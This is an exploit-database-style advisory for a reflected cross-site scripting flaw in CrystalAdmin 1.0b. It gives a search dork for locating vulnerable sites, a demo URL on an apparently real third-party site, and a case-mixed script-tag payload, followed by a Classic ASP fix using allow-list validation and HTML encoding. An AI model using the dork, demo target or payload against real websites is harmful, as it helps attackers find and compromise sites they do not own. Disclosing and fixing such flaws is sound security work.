~ Title: CrystalAdmin Cross Site Scripting Vulnerability
~ Version: 1.0b
~ Author: P0W3RFU7
~ Credit: Ajax Security Team
~ Email: Pandidan@Gmail.com
=-=-=-=-=-=-=-=-=-=-=-=-(Vulnerability Details)-=-=-=-=-=-=-=-=-=-=-=-=
~ Dork: "/catalogue/products.asp?s="
~ Sample: http://www.target.com/catalogue/products.asp?s=[XSS]
~ Demo: http://www.airluxe.co.uk/catalogue/products.asp?s=[XSS]
~ XSS: <ScRiPt>alert('XSS Vuln')</sCriPt>
~ Fix: Filter input parameters for special characters
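
One way to apply the fix above in Classic ASP (added example, not CrystalAdmin's own code). The products.asp source is not shown in this advisory, so the unencoded echo in the comment, the CleanSearchTerm helper, the MAX_TERM_LEN limit and the allowed character set are assumptions:

```asp
<%@ Language="VBScript" CodePage="65001" %>
<%
Option Explicit
Response.Charset = "utf-8"

' Pattern this kind of page is assumed to have used (unencoded echo):
'   Response.Write "Results for: " & Request.QueryString("s")

Const MAX_TERM_LEN = 64   ' assumed limit for a catalogue search term

' Allow-list validation: returns the term if it contains only expected
' characters, otherwise an empty string.
Function CleanSearchTerm(ByVal raw)
    Dim s, re
    CleanSearchTerm = ""
    s = Trim(CStr(raw))
    If Len(s) = 0 Or Len(s) > MAX_TERM_LEN Then Exit Function
    Set re = New RegExp
    re.Pattern = "^[A-Za-z0-9 _.\-]+$"
    If re.Test(s) Then CleanSearchTerm = s
    Set re = Nothing
End Function

Dim term
term = CleanSearchTerm(Request.QueryString("s"))
%>
<html>
<body>
  <form method="get" action="products.asp">
    <!-- Server.HTMLEncode escapes < > & and ", not ', so the attribute stays double-quoted -->
    <input type="text" name="s" value="<%= Server.HTMLEncode(term) %>">
  </form>
<% If term = "" Then %>
  <p>Please enter a valid search term.</p>
<% Else %>
  <p>Results for: <%= Server.HTMLEncode(term) %></p>
<% End If %>
</body>
</html>
```

Input filtering alone is easy to get wrong, so the example encodes the value at every point where it is written into HTML, even after it has passed the allow-list.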
=-=-=-=-=-=-=-=-=-=-=-=-=-=(Thanks)=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
HUrr!c4nE - Cair3x - black.shadowes - hadihadi - iM4n - Mormoroth - irsdl
Mr.Hesy - 4m!n - Dj7xpl - Sc0rpion - Expl0its - The-0utl4w - Mikili - Net.Edit0r
md.r00t - S3Ri0uS - NeFrin - Skitt3r - Army.Hidden - Takpar (MBFF)